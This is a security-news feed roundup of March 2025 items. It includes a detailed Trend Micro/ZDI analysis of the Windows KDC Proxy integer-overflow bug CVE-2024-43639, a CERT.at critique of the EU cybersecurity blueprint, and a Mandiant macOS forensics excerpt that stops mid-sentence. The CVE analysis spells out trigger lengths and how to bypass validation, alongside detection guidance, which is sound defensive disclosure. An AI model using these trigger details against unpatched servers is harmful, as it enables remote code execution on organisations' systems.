Flagship events in Raleigh, Berlin, and Copenhagen set to strengthen international cybersecurity collaboration amid surge in cross-border security incidents

https://www.first.org/newsroom/releases/20250305
Strengthening OT Security: Aligning with the Australian Energy Sector Cyber Security Framework (AESCSF)
2025-03-04T22:00:00Z | 1741125600

In an era where cyber threats to critical infrastructure are escalating, the Australian energy sector faces unique challenges in safeguarding... The post Strengthening OT Security: Aligning with the Australian Energy Sector Cyber Security Framework (AESCSF)  first appeared on Dragos.

https://www.dragos.com/blog/strengthening-ot-security-aligning-with-the-australian-energy-sector-cyber-security-framework-aescsf/
Navigieren durch DORA und wichtige Anforderungen für Organisationen
2025-03-04T17:31:06Z | 1741109466

The financial sector is increasingly reliant on digital infrastructure, making cybersecurity and operational resilience critical. Recognizing this, the European Union introduced the Digital Operational Resilience Act (DORA), effective as of January 17, 2025. The post Navigating DORA and Key Requirements for Organizations appeared first on Skyhigh Security.

https://www.skyhighsecurity.com/industry-perspectives/navigating-dora-and-key-requirements-for-organizations.html
CVE-2024-43639: Remote Code Execution in Microsoft Windows KDC Proxy
2025-03-04T17:02:27Z | 1741107747

In this excerpt of a Trend Micro Vulnerability Research Service vulnerability report, Simon Humbert and Guy Lederfein of the Trend Micro Research Team detail a recently patched code execution vulnerability in the Microsoft Windows Key Distribution Center (KDC) Proxy. This bug was originally discovered by k0shl and Wei in Kunlun Lab with Cyber KunLun. Successful exploitation could result in arbitrary code execution in the security context of the target service. The following is a portion of their write-up covering CVE-2024-43639, with a few minimal modifications. An integer overflow has been reported for Microsoft Windows KDC Proxy. The vulnerability is due to a missing check for Kerberos response length.A remote, unauthenticated attacker could direct KDC proxy to forward a Kerberos request to a server under their control, which would then send back a crafted Kerberos response. Successful exploitation could result in arbitrary code execution in the security context of the target service.The VulnerabilityThe Microsoft Windows operating system implements a default set of authentication protocols, including Kerberos, NTLM, Transport Layer Security/Secure Sockets Layer (TLS/SSL), and Digest, as part of an extensible architecture. For authentication within an Active Directory domain, Windows uses Kerberos.Kerberos is a computer-network authentication protocol that works on the basis of tickets to allow nodes communicating over a non-secure network to prove their identity to one another in a secure manner. Kerberos builds on symmetric-key cryptography and requires a trusted third party, the key distribution center (KDC), that shares a key with all other parties in the authentication realm. Clients and services exchange Kerberos messages with the KDC. Kerberos messages can be transported over either UDP or TCP on port 88. When sent over TCP however, each request and response is preceded by the length of the message as 4 octets in network byte order.The Microsoft Windows Server operating systems implement the Kerberos version 5 authentication protocol. Each Active Directory domain controller runs an instance of the Kerberos KDC, which uses the domain's directory service database as its security account database. To authenticate, a client must have network connectivity to a domain controller. Although this is generally the case for machines located within an organization's network, this may not be true for clients using remote connections. To enable remote workloads, notably services such as RDP Gateway and DirectAccess, it is possible to proxy Kerberos traffic over HTTPS using a KDC Proxy.A KDC Proxy is an HTTP-based server that implements the Kerberos KDC Proxy Protocol (KKDCP). Clients wrap their Kerberos request in a KDC proxy message and send it in the body of an HTTPS POST request where the Request-URI is set to /KdcProxy. KDC proxy messages are defined using Abstract Syntax Notation One (ASN.1). ASN.1 is a standard interface description language (IDL) for defining data structures that can be serialized and deserialized in a cross-platform way. The full specification of ASN.1 including its lexical units, separators, recursive definitions, native data types, whitespace, production rules, etc. can be found here.Here is the structure of KDC Proxy messages: Where:·      kerb-message is a Kerberos message, including the 4 octet message length prefix.·      target-domain is a DNS or NetBIOS domain name that represents the realm to which the Kerberos message must be sent (target-domain is required for KDC proxy requests but is not used for KDC proxy responses).·      dclocator-hint is an optional field that contains additional data used to find a domain controller.KDC Proxy messages are encoded using the Distinguished Encoding Rules (DER). DER is a type-length-value encoding system, each DER-encoded field has the following structure: Identifier Octets encode the type of the Contents Octets. Generally, it consists of a single octet with the following structure: The Class field can be one of Universal (bits: 00), Application Specific (bits: 01), Context-specific (bits: 10), or Private (bits: 11). The P/C field specifies whether the field is a primitive data type (bit: 0) such as INTEGER, or a constructed data type (bit: 1), i.e. whose Content Octets contain other primitive or constructed data types. If the Class field is Universal, then the specification defines several standard Tag Numbers such as BOOLEAN(\x1), INTEGER (\x2), OCTET STRING (\x4), UTF8STRING (\x0C), SEQUENCE (\x10), IA5STRING (\x16), GeneralString (\x1B), etc. In the case of non-Universal classes, there are rules for encoding Tag Numbers larger than 30.In DER, there are two ways to encode Length Octets. In the short form, a single Length Octet is used with the most significant bit set to 0, and the 7 remaining bits represent the number of Content Octets. In the long form, the most significant bit of the first Length Octet is set to 1, and the 7 remaining bits encode the number of subsequent Length Octets, which themselves contain the number of Content Octets. The long form is typically used only when necessary. All multibyte integers are in big-endian format.As an example, here is how a KDC proxy request would look like after being encoded: Indentation shows the relationship between constructed and primitive data types. Please note that the tag number for SEQUENCE is \x10, however, the SEQUENCE field is a constructed data type with the P/C field is set to 1. Therefore, the Identifier Octet for SEQUENCE is 0x30. The SEQUENCE items are assigned explicit tags from 0 to 2, and when encoded, they are encapsulated in an EXPLICIT tag data type. In the Identifier Octet for the EXPLICIT tag, the Class field is set to Context-Specific (bits: 10), and the P/C field is set to 1. Finally, Kerberos realms are encoded as KerberosString, which is an alias for GeneralString. Upon reception of a KDC proxy request, the KDC proxy extracts the target-domain and locates a domain controller for that realm. First the KDC proxy queries the DNS SRV record for the name _kerberos._tcp.Default-First-Site-Name._sites.dc._msdcs., and resolves matching A records if needed. Then the KDC proxy sends an LDAP ping to the resulting set of IP addresses. An LDAP ping is a connection-less LDAP (CLDAP) rootDSE search for the Netlogon attribute, used to verify the aliveness of a domain controller, and check whether it matches a specific set of requirements. The domain controller returns a little-endian byte string that encodes a NETLOGON_SAM_LOGON_RESPONSE_EX structure.Finally, the KDC proxy extracts kerb-message from the KDC proxy request and forwards it to the domain controller. Please note that KDC proxy only forwards Kerberos requests over TCP. Please also note that, while it can only be run on domain-joined machines, KDC proxy will proxy Kerberos requests for arbitrary domains. When KDC Proxy receives a Kerberos response from the domain controller, it wraps it in a KDC proxy message (which only contains the kerb-message field), and returns it to the client in the body of an HTTPS 200 OK response.An integer overflow has been reported for Microsoft Windows KDC Proxy. The vulnerability is due to a missing check for the length of Kerberos responses. After sending the Kerberos request to the domain controller, the KDC proxy reads 4 bytes from the network socket to get the Kerberos response length. Then, it attempts to read as many bytes as required to get the full response. A number of functions are involved in reading the Kerberos response, all of them are passed a pointer to a _KPS_IO structure as argument. _KPS_IO structures have a size of 0x120 bytes, here is a partial definition below (all structure definitions in this section were determined by reverse engineering; most structure and field names were chosen by us): Whenever subsequent bytes are read from the socket, function KpsSocketRecvDataIoCompletion() in DLL file kpssvc.dll is called. It checks if enough bytes were read to get the full response, and if yes calls the function KpsPackProxyResponse(), passing a pointer to the _KPS_IO structure as an argument. KpsPackProxyResponse() first calls function KpsCheckKerbResponse() that validates the Kerberos response. Notably, if the byte that immediately follows the message length prefix is set to `0x7E` or `0x6B`, KpsCheckKerbResponse() verifies that the response is a properly constructed Kerberos message. If it is not the case, it does not perform any validation and returns without error.KpsPackProxyResponse() local variables include a structure of type ASN1_KDC_PROXY_MSG. ASN1_KDC_PROXY_MSG structures have a size of `0x28` bytes, here is a partial definition below: After calling KpsCheckKerbResponse(), KpsPackProxyResponse() initializes the structure as such: ASN1_KDC_PROXY_MSG.buf is set to _KPS_IO.recvbuf, and ASN1_KDC_PROXY_MSG.len is set to _KPS_IO.bytesread. Then, for wrapping the Kerberos response in a KDC proxy response it calls the function KpsDerPack(), passing the address of the ASN1_KDC_PROXY_MSG structure as an argument. From this moment on, the code flow alternates between functions from the DLL file kpssvc.dll implementing the KDC proxy server and functions from the Microsoft ASN.1 library msasn1.dll. The latter are subsequently referred to as "MSASN.1" functions.KpsDerPack() calls MSASN.1 function ASN1_CreateEncoder(), which allocates a structure of type ASN1_encoder. ASN1_encoder structures have a size of `0x50` bytes, here is a partial definition below: KpsDerPack() then calls MSASN.1 function ASN1_Encode(), passing pointers to the ASN1_encoder and ASN1_KDC_PROXY_MSG structures as arguments. ASN1_Encode() calls function ASN1Enc_KDC_PROXY_MESSAGE(). ASN1Enc_KDC_PROXY_MESSAGE() calls the MSASN.1 function ASN1BEREncExplicitTag(), passing a pointer to the ASN1_encoder structure as an argument. ASN1BEREncExplicitTag() is called twice, to encode the SEQUENCE and EXPLICIT fields.Encoded data is appended to ASN1_encoder.buf, and the buffer is allocated then re-allocated as fields are being encoded. To do this, MSASN.1 functions call ASN1EncCheck(), passing the needed size as an argument. For the initial allocation, ASN1EncCheck() allocates space in the heap by calling the Windows API function LocalAlloc(). The size of the initial allocation is at least 1,024 bytes. During subsequent invocations, ASN1EncCheck() reallocates the buffer if it cannot fit the needed size. In that case, it adds the current size of the buffer and the needed size, then passes the result as an argument to the Windows API function LocalReAlloc().ASN1BEREncExplicitTag() calls MSASN.1 function ASN1BEREncTag(). ASN1BEREncTag() encodes the Identifier Octets, first by calling ASN1EncCheck() to make sure ASN1_encoder.buf has enough space, then writing the Identifier Octets at the address ASN1_encoder.current, and finally incrementing ASN1_encoder.current. At thisstage, the length of constructed fields is not known, as it depends on the length of other constructed and primitive fields that are yet to be encoded. So ASN1BEREncExplicitTag() reserves a single byte for the Length Octets in ASN1_encoder.buf by calling ASN1EncCheck() with size 1, and incrementing ASN1_encoder.current by 1.ASN1Enc_KDC_PROXY_MESSAGE() then calls MSASN.1 function ASN1DEREncOctetString() to encode the kerb-message OCTET STRING field, passing as arguments a pointer to the ASN1_encoder structure as well as ASN1_KDC_PROXY_MSG.buf and ASN1_KDC_PROXY_MSG.len. ASN1DEREncOctetString() is an alias for the function ASN1BEREncCharString(). ASN1BEREncCharString() first calls ASN1BEREncTag() to encode the Identifier Octets, then it calls ASN1BEREncLength(), passing ASN1_KDC_PROXY_MSG.len as argument.ASN1BEREncLength() first computes the number of bytes required for encoding the Length Octets, adds ASN1_KDC_PROXY_MSG.len, and then passes the resulting value as an argument to ASN1EncCheck(). This ensures that ASN1_encoder.buf has enough space for both the Length Octets and the Contents Octets. ASN1BEREncLength() then writes the Length Octets at address ASN1_encoder.current, and finally increments ASN1_encoder.current by the size of Length Octets. Finally, ASN1BEREncCharString() calls the Windows API function memcpy() to copy ASN1_KDC_PROXY_MSG.len from address ASN1_KDC_PROXY_MSG.buf to address ASN1_encoder.current. However, MSASN.1 functions do not always handle unexpected inputs properly, notably, they don't check for possible integer overflows when handling large length values. Furthermore, KpsSocketRecvDataIoCompletion() does not check the length of the Kerberos response before calling KpsPackProxyResponse(). Finally, the Kerberos response validation in KpsCheckKerbResponse() can be bypassed by setting the byte immediately following the message length prefix to any value other than 0x7E or 0x6B. As a consequence, it is possible for a malicious domain controller to send a large Kerberos response that will cause memory corruption errors. Integer overflows and memory corruption errors occur when encoding the kerb-message OCTET STRING field. At this point, both SEQUENCE and EXPLICIT fields have already been encoded, ASN1_encoder.buf points to a buffer of size 1,024, and ASN1_encoder.current points at the address ASN1_encoder.buf + 4. The maximum size for Kerberos responses accepted by KDC Proxy is 4,294,967,295. If sending a Kerberos response with a length from 4,294,967,291 to 4,294,967,295 (inclusive), ASN1BEREncLength() will find that 5 bytes are required to encode the Length Octets, then add the length of the Kerberos response. However, the addition result is stored in a 4-byte unsigned variable that overflows. As a consequence, the size passed as an argument to ASN1EncCheck() is very small. ASN1EncCheck() does not reallocate the ASN1_encoder.buf buffer and later, when ASN1BEREncCharString() calls memcpy() a heap buffer overflow occurs. Alternatively, when sending a Kerberos response with a length from 4,294,966,267 to 4,294,967,290 (inclusive), ASN1BEREncLength() calls ASN1EncCheck(). As the current ASN1_encoder.buf buffer is too small, ASN1EncCheck() proceeds to reallocate it. It adds the current size of the buffer (1,024) to the length of the Kerberos response. However, the addition result is stored in a 4-byte unsigned variable that overflows. As a consequence,LocalReAlloc() actually decreases the size of the buffer. Later when ASN1BEREncCharString() calls memcpy() an out-of-bounds write or a heap buffer overflow occurs. As an interesting edge case, it is possible to pass 0 as the new size to LocalReAlloc(). LocalReAlloc() returns a memory address, not an error, however, the memory is not actually allocated, and an access violation occurs when attempting to write to that address.A remote, unauthenticated attacker could direct KDC proxy to forward a Kerberos request to a server under their control, which would then send back a crafted Kerberos response. Successful exploitation could result in arbitrary code execution in the security context of the target service.Note: to reach the vulnerable code, it is not enough to send a short Kerberos response with a large message length prefix value in the first four bytes. The Kerberos response length must actually match the prefix value.Detection GuidanceTo detect an attack exploiting this vulnerability, the detection device must monitor and parse traffic on UDP port 389 and TCP port 88. Kerberos messages can be transported over either UDP or TCP on port 88. However, when sent over TCP, each request and response is preceded by the length of the message as 4 octets in network byte order.The detection device must inspect Kerberos responses. Please note that KDC Proxy only uses TCP port 88 for Kerberos traffic (not UDP). Therefore, the device does not need to fully parse Kerberos responses. It just needs to parse the 4-byte message length prefix and be able to isolate responses within a TCP stream. If a Kerberos response is 0x80000000 (2,147,483,648) bytes or longer the traffic should be considered suspicious, an attack exploiting this vulnerability is likely underway.Note: The detection guidance above is based on section 7.2.2 of the Kerberos V5 RFC. It mentions that, in the 4 octets message length prefix, the high bit must be set to 0. So, according to the RFC, the maximum length of Kerberos messages transmitted over TCP is 0x7FFFFFFF.Questions About the PatchOur research shows that the vulnerability lies in the ASN.1 library, however, the Microsoft advisory mentions the KDC Proxy server. Furthermore, the vulnerability was addressed by adding a length check in the KDC Proxy KpsSocketRecvDataIoCompletion() function. It is unclear why Microsoft chose this approach. It is possible that the ASN.1 library is known to have bugs, and that is expected for invoking software to check its inputs. It is also unclear whether any other software components can be used to trigger the vulnerability in the ASN.1 library. As such, the present report focuses on the KDC Proxy server.ConclusionThis vulnerability was patched by the vendor in November. To date, no attacks have been detected in the wild. Microsoft doesn’t provide any mitigations for this bug, but they do note only servers configured as a KDC server are affected. Domain controllers are not impacted by this issue. They also note that since the vulnerability exists in the KDC Proxy Server service (KDCSVC), you are only vulnerable if you are already using KPSSVC in your environment. If you do not have it configured in your environment, then this vulnerability is not exploitable. We recommend all instances of KPSSVC server be patched immediately.Special thanks to Simon Humbert and Guy Lederfein of the Trend Micro Research Team for providing such a thorough analysis of this vulnerability. For an overview of Trend Micro Research services please visit http://go.trendmicro.com/tis/.The threat research team will be back with other great vulnerability analysis reports in the future. Until then, follow the team on Twitter, Mastodon, LinkedIn, or Bluesky for the latest in exploit techniques and security patches.

https://www.thezdi.com/blog/2025/3/3/cve-2024-43639
Aryaka Expands Global Go to Market Investment to Meet Growing Worldwide Demand for Unified SASE as a Service
2025-03-04T16:41:57Z | 1741106517

Santa Clara, CA, March 4, 2025 – Aryaka®, the leader in and first to deliver Unified SASE as a Service, today announced a significant GTM investment across the Asia Pacific region as well as new GTM executives globally. As part of the expansion, Aryaka has added new partnerships with NI+C in Japan and ASV Platforms... The post Aryaka Expands Global Go to Market Investment to Meet Growing Worldwide Demand for Unified SASE as a Service appeared first on Aryaka.

https://www.aryaka.com/press/aryaka-global-go-to-market-expansion-for-unified-sase-as-a-service/
A Revision of the EU Cybersecurity Blueprint
2025-03-04T15:56:34Z | 1741103794

Introduction The original EU cybersecurity blueprint from 2017 (officially: “Commission Recommendation of 13.9.2017 on Coordinated Response to Large Scale Cybersecurity Incidents and Crises”) is now close to seven years old and an update is overdue. The Commission recently published a draft for an updated version, and I’d like to take this opportunity to publish my feedback to this text. Overall, this is good document, both readable and quite short. As it is full of references to other EU documents, it would really benefit from a consistent use of hypertext links in the text. There are some URLs in the footnotes, but not all are actually active, clickable links in the pdf version. Having the links directly in the main text might not be standard in EU documents but would make reading the document in its digital form more accessible. DNS/Cloud Recital (16) and points (15) and (16) single out DNS resolution capabilities as a critical technical dependency. Yes, DNS resolutions is important, but it is by far not the only one. DNS4EU might be a worthwhile EU initiative, but that should not elevate it to a critical component in the EU cybersecurity blueprint. Other dependencies worth looking at are the Internet’s routing infrastructure, including the mechanism for securing BGP, the authoritative side of the DNS, content delivery networks (CDNs – where some services claim to serve significant portions of the global content), large e-mail operators and the hyper-scaler IaaS/PaaS/SaaS cloud services. The singular focus on DNS resolution is not warranted. We shouldn't just talk about the dependency where we have an EU alternative in place. Triggers for large-scale incidents The text is not really explicit about this, but it reads like it implicitly assumes that malicious technical cyber operations will be the cause for large-scale incidents. In other words, some sort of illegal access to computing resources in the EU (or a denial-of-service attack) with either hacktivist, criminal or political motivations. I think this is far too narrow. One of the basic ways of looking at cyber security is the C-I-A triad: Confidentiality, Integrity and Availability. And the latter is not only threatened by “malicious hackers”, but mainly (if one looks at NIS 1 mandatory reporting) by bugs, mistakes of operators, flooding, backhoes + anchors, failing disks, power outages, and dozens of other reasons for IT Oopsies. The incident from July 2024 where a CrowdStrike EDR update crashed 8.5 million systems worldwide, is a good example. As a thought experiment: assume that a similar error results in a more sustained downtime or even data loss: would the blueprint be applicable? Another possible trigger for a large-scale incident could be supply chain issues. Here EU documents usually only think in terms of the SolarWinds incident of 2019/20 or the trustworthiness of certain categories of vendors (see the 5G toolbox). In focus are network intrusions caused by security problems by managed service providers, by business partners, by vendors, or outsourcing partners. We sometimes forget about the most basic of supply chain issues: not being supplied any more. Supply chain disruptions in the software business used to be long-term issues: maybe the supplier cancels the product, and you must transition to another one, or there might be issues with updates and security fixes. In the age of online license checks and Software-as-a-Service delivered via the cloud, any disruptions on the side of the vendor can have immediate effects on all his customers. That all assumes that the vendor is acting freely, but this assumption might be wrong: in the case of geopolitical tensions, other forces might trump the will and the interests of a vendor. There might be sanctions, there might be secondary sanctions, there might be sudden export restrictions, and, in the case of hardware supply, there might be disruptions in the production. Not all of these cases will be something where the CSIRTs (or commercial incident response companies) can ride in to save the day, some of these cases will be highly political and will require a solution on that layer. Better yet, these cases need to be considered long before the crisis hits. Sometimes I think that “rely completely on US cloud providers” is the 2025 version of “buy natural gas exclusively from Russia”. High-risk vendors In recital (18), “high-risk suppliers” is only used in the context of “vulnerabilities have to be disclosed for state use”. This is one-dimensional thinking. Suppliers can be high-risk because they are a monopoly and can thus raise prices without market considerations. Others may become a pawn in geopolitical power-plays. Secure Communication As recital (23) states, communication can be a key component in handling a crisis. But we don’t need yet another bespoke solution for the EU entities and their national partners, we need something where we can also add the private sector to the communication, as they are the ones who run most of our digital infrastructure. Insofar, recital (24) is correct: we need to think not in individual silos. Instead, the crisis communication and response need to bridge between them. The idea from point (30) to use Matrix as a technological base is a good one. One word of caution, though: we cannot continue to use Open-Source software and only think of deployment costs, we also need to reserve funding for the development and maintenance of the product itself. For example, when switching from the commercial version of Mattermost to Matrix, one should redirect a considerable fraction of the no longer needed license fees to support the Open-Source project. Situational Awareness II(6) is a bit too much focussed on technical part of the situational awareness. A complete threat assessment also needs to factor in the motivation, capabilities and intentions of possible adversaries. This is something I hear often from the private sector: they are mostly satisfied with the technical CTI available to them, but they lack the strategic intelligence on potentially adversary actors ranging from hacktivists, organized crime up to state actors. Point (23) is well taken, but what about the commission’s own cyber situation centre? What value can that provide to the aggregated situational awareness of all actors? Taxonomy To be honest, there are already too many proposals for incident taxonomies out there. Doing yet another iteration is unlikely to improve the situation. Where a common taxonomy is really missing in practice is a unified severity scale. Responding to a cyber crisis Point (25) is the core of the document. (a) is fine, it correctly defines the role of the CSIRTs Network. I have issues with (b): it should be the sole responsibility of EU-CyCLONe to provide information about the impact of an incident to the political layer. Its members are the national cyber crisis coordinators, they should have the national impact assessments and can aggregate those within their network. The CSIRTs are focussing on the technical, purely cyber parts of the incident. The aggregation of this technical information in the CSIRTs Network talks about intrusion vectors, vulnerabilities, indicators of compromise, affected IT systems, mitigation measures, and expected time to restore. This is the information that the CSIRTs Network will share with EU-CyCLONe. Crisis Management The text is a bit thin on the actual crisis management processes used across all actors. For example: I assume that the national CSIRTs will operate under the direction of their respective national crisis centres. Their main reporting requirements will be there and decisions by the national crisis manager will have precedence to any request coming in from the CSIRTs Network. Or: how much will EU-CyCLONe act as the crisis coordinator for the CSIRTs Network? My assumption here is “not at all”, instead I expect that requests from EU-CyCLONe will first go to the national cyber crisis coordinator who will, if sensible, instruct the national CSIRT accordingly. In other words, crisis management needs clear responsibilities and chains of command; a simple “everybody should cooperate” is not enough. This blueprint should be clearer on the questions whether those chains of command are on the national side or on the EU side. EU Cybersecurity Reserve There is no need to describe the SLA of the reserve in this text, point 26(a) should be removed. A statement on the information flow triggered by the deployment of the reserve would improve the document.

https://www.cert.at/en/blog/2025/3/a-revision-of-the-eu-cybersecurity-blueprint
Analysis of a JavaScript-based Phishing Campaign Targeting Microsoft 365 Credentials
2025-03-04T15:22:39Z | 1741101759

Written by ARC Labs contributors, John Dwyer and Eric Gonzalez ARC Labs recently discovered a JavaScript-based credential harvesting campaign leveraging fake voicemail notifications as a lure to capture Microsoft 365 credentials. ARC Labs has observed that JavaScript-based credential harvesting campaigns have seen a significant uptick, becoming a prevalent threat in the cybersecurity landscape. Attackers increasingly utilize obfuscation and […] The post Analysis of a JavaScript-based Phishing Campaign Targeting Microsoft 365 Credentials appeared first on Binary Defense.

https://www.binarydefense.com/resources/blog/analysis-of-a-javascript-based-phishing-campaign-targeting-microsoft-365-credentials/
Cyber threat bulletin: People’s Republic of China-sponsored cyber activity against Canadian provincial, territorial, Indigenous, and municipal governments
2025-03-04T15:11:58Z | 1741101118

https://cyber.gc.ca/en/guidance/cyber-threat-bulletin-peoples-republic-china-sponsored-cyber-activity-against-canadian-provincial-territorial-indigenous-and-municipal-governments
EdTech’s Digital Dilemma and How Schools Are at Risk
2025-03-04T14:45:35Z | 1741099535

Every day, we hear about some new digital innovation that can change the world; education technology (EdTech) is a great example. From artificial intelligence (AI)-driven tutors to immersive virtual reality (VR) classrooms, EdTech is reshaping how we learn. But data breaches, system failures, and slowdowns can disrupt...

https://www.netscout.com/blog/edtechs-digital-dilemma-and-how-schools-are-risk
Data443 Completes Operational Expense Rationalization
2025-03-04T14:15:12Z | 1741097712

RESEARCH TRIANGLE PARK, N.C., March 04, 2025 — Data443 Risk Mitigation, Inc. (OTCPK: ATDS) (“Data443” or the “Company”), an AI data security and privacy software company for “All Things Data Security,” today announced the completion of major operational expense rationalizations yielding immediate and long-term financial benefits. $3.1 Million in Annual… The post Data443 Completes Operational Expense Rationalization appeared first on Data443.

https://data443.com/data443-completes-operational-expense-rationalization/
An Inside Look at Cato’s New AI Assistant
2025-03-04T13:07:50Z | 1741093670

In line with our philosophy of delivering an exceptional customer experience, Cato Networks has added a knowledge-base AI assistant as part of the Cato SASE Cloud Platform. The AI assistant provides accurate, relevant answers to questions about using Cato’s many capabilities with detailed, step-by-step instructions uniquely suited to the user’s situation and circumstance.   This... The post An Inside Look at Cato’s New AI Assistant   appeared first on Cato Networks.

https://www.catonetworks.com/blog/inside-look-at-catos-new-ai-assistant/
Red Flag Bulletin | March 2025 | Amazon under investigation in Italy for alleged tax evasion
2025-03-04T09:42:08Z | 1741081328

This month’s top stories: Amazon under investigation in Italy for alleged tax evasion worth EUR 1.2 billion; Argentina’s president Javier Milei investigated for cryptocurrency fraud for promoting cryptocurrency $LIBRA, which collapsed soon afterwards; and US seeks support of Indian authorities to serve complaint to businessman Gautam Adani in USD 265 million bribery case.

https://www.s-rminform.com/red-flag-bulletin/march-2025
Clavister Achieves Common Criteria Certification for Latest AI-powered Software
2025-03-04T09:00:00Z | 1741078800

4 March 2025 – Örnsköldsvik, Sweden – Clavister, a leading European cybersecurity provider for mission-critical applications, announced today that its latest firewall software release, Clavister cOS Core 15, has achieved… Read more The post Clavister Achieves Common Criteria Certification for Latest AI-powered Software appeared first on Clavister. About Clavister Clavister is a leading European cybersecurity vendor with over 20 years of experience. Seated in Sweden, the company has customers—communication service providers, governments, enterprises and managed security service providers (MSSPs)—in more than 150 countries. Clavister provides unique security solutions to protect their digital assets and secure business continuity. The stock, Clavister Holding AB, is listed at NASDAQ First North under short name CLAV.

https://www.clavister.com/clavister-achieves-common-criteria-certification-for-latest-ai-powered-software/
Why Are Airlines a Prime Target for Cyberattacks?
2025-03-04T07:00:00Z | 1741071600

https://www.akamai.com/blog/security/2025/mar/why-are-airlines-prime-target-for-cyberattacks
Security Alert (A25-03-02): Multiple Vulnerabilities in Android
2025-03-04T04:00:00Z | 1741060800

Google has released Android Security Bulletin March 2025 to fix multiple security vulnerabilities in Android operating system.

https://www.govcert.gov.hk/en/alerts_detail.php
Cross-Domain Solutions: The Backbone of AI Data Assurance
2025-03-04T01:18:18Z | 1741051098

In today’s interconnected world, managing artificial intelligence (AI)- powered systems is no longer just about harnessing computing power—it’s about ensuring confidentiality, reliability, and availability of the data that fuels these systems. Nowhere is this more critical than in environments like the Department of Defense (DoD), where decisions made in real time can have life-and-death consequences.... View Article The post Cross-Domain Solutions: The Backbone of AI Data Assurance appeared first on Owl Cyber Defense.

https://owlcyberdefense.com/blog/cross-domain-solutions-the-backbone-of-ai-data-assurance/
miniaudio ma_dr_flac__decode_samples__lpc out-of-bounds write vulnerability
2025-03-04T00:00:00Z | 1741046400

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2063
Detecting Hotkey-Based Keyloggers Using an Undocumented Kernel Data Structure
2025-03-04T00:00:00Z | 1741046400

In this article, we explore what hotkey-based keyloggers are and how to detect them. Specifically, we explain how these keyloggers intercept keystrokes, then present a detection technique that leverages an undocumented hotkey table in kernel space.

https://www.elastic.co/security-labs/detecting-hotkey-based-keyloggers
Attackers Don’t Hack In—They Log In: The MFA Blind Spot by Lucie Cardiet
2025-03-04T00:00:00Z | 1741046400

Attackers bypass MFA using non-interactive sign-ins. Learn how to detect and stop credential-based threats before they escalate.

https://www.vectra.ai/blog/attackers-dont-hack-in-they-log-in-the-mfa-blind-spot
GreyNoise Observes Exploitation of Three Newly Added KEV Vulnerabilities
2025-03-04T00:00:00Z | 1741046400

On March 3, 2025, the Cybersecurity and Infrastructure Security Agency added five vulnerabilities to its Known Exploited Vulnerabilities catalog, confirming their exploitation in the wild.

https://www.greynoise.io/blog/greynoise-observes-exploitation-three-newly-added-kev-vulnerabilities
Chatbots podem expor dados confidenciais em 2025
2025-03-03T22:44:28Z | 1741041868

https://nsfocusglobal.com/web-stories/chatbots-podem-expor-dados-confidenciais-em-2025/
What Is a SBOM? Binary vs Build-Time vs Source Code
2025-03-03T17:32:22Z | 1741023142

Get the key takeaways—listen to the audio overview.   Software Bills of Materials (SBOMs) are a detailed inventory of all the components—open source, proprietary, and third-party—used within a software application. SBOMs play a key role in ensuring software integrity, managing security risks, and strengthening software supply chain security.  As SBOM requirements expand around the globe, […] The post What Is a SBOM? Binary vs Build-Time vs Source Code appeared first on RunSafe Security.

https://runsafesecurity.com/blog/what-is-sbom/
Secure. Flexible. Optimized: Introducing Owl Talon v3.2
2025-03-03T16:18:23Z | 1741018703

The Owl Cyber Defense team is proud to announce the release of Owl Talon 3.2.0.0, which brings with it several new features designed to keep pace with rapidly evolving cybersecurity needs. The Owl Talon platform goes beyond a traditional diode for unmatched flexibility, security and long-lasting reliability. Available in multiple form-factors and compatible with several... View Article The post Secure. Flexible. Optimized: Introducing Owl Talon v3.2 appeared first on Owl Cyber Defense.

https://owlcyberdefense.com/blog/talon-release-3200/
SASEfy 2025: The Summit for SASE and AI
2025-03-03T16:12:42Z | 1741018362

The post SASEfy 2025: The Summit for SASE and AI appeared first on Cato Networks.

https://www.catonetworks.com/resources/sasefy-2025/
Not Lost in Translation: Rosetta 2 Artifacts in macOS Intrusions
2025-03-03T14:00:00Z | 1741010400

Written by: Joshua Goddard Executive Summary Rosetta 2 is Apple's translation technology for running x86-64 binaries on Apple Silicon (ARM64) macOS systems. Rosetta 2 translation creates a cache of Ahead-Of-Time (AOT) files that can serve as valuable forensic artifacts. Mandiant has observed sophisticated threat actors leveraging x86-64 compiled macOS malware, likely due to broader compatibility and relaxed execution policies compared to ARM64 binaries. Analysis of AOT files, combined with FSEvents and Unified Logs (with a custom profile), can assist in investigating macOS intrusions. Introduction Rosetta 2 (internally known on macOS as OAH) was introduced in macOS 11 (Big Sur) in 2020 to enable binaries compiled for x86-64 architectures to run on Apple Silicon (ARM64) architectures. Rosetta 2 translates signed and unsigned x86-64 binaries just-in-time or ahead-of-time at the point of execution. Mandiant has identified several new highly sophisticated macOS malware variants over the past year, notably compiled for x86-64 architecture. Mandiant assessed that this choice of architecture was most likely due to increased chances of compatibility on victim systems and more relaxed execution policies. Notably, macOS enforces stricter code signing requirements for ARM64 binaries compared to x86-64 binaries running under Rosetta 2, making unsigned ARM64 binaries more difficult to execute. Despite this, in the newly identified APT malware families observed by Mandiant over the past year, all were self-signed, likely to avoid other compensating security controls in place on macOS. The Rosetta 2 Cache When a x86-64 binary is executed on a system with Rosetta 2 installed, the Rosetta 2 Daemon process (oahd) checks if an ahead-of-time (AOT) file already exists for the binary within the Rosetta 2 cache directory on the Data volume at /var/db/oah//. The UUID value in this file path appears to be randomly generated on install or update. If an AOT file does not exist, one will be created by writing translation code to a .in_progress file and then renaming it to a .aot file of the same name as the original binary. The Rosetta 2 Daemon process then runs the translated binary. The /var/db/oah directory and its children are protected and owned by the OAH Daemon user account _oahd. Interaction with these files by other user accounts is only possible if System Integrity Protection (SIP) is disabled, which requires booting into recovery mode. The directories under /var/db/oah// are binary UUID values that correspond to translated binaries. Specifically, these binary UUID values are SHA-256 hashes generated from a combination of the binary file path, the Mach-O header, timestamps (created, modified, and changed), size, and ownership information. If the same binary is executed with any of these attributes changed, a new Rosetta AOT cache directory and file is created. While the content of the binaries is not part of this hashing function, changing the content of a file on an APFS file system will update the changed timestamp, which effectively means content changes can cause the creation of a new binary UUID and AOT file. Ultimately, the mechanism is designed to be extremely sensitive to any changes to x86-64 binaries at the byte and file system levels to reduce the risk of AOT poisoning. Figure 1: Sample Rosetta 2 cache directory structure and contents The Rosetta 2 cache binary UUID directories and the AOT files they contain appear to persist until macOS system updates. System updates have been found to cause the deletion of the cache directory (the Random UUID directory). After the upgrade, a directory with a different UUID value is created, and new Binary UUID directories and AOT files are created upon first launch of x86-64 binaries thereafter. Translation and Universal Binaries When universal 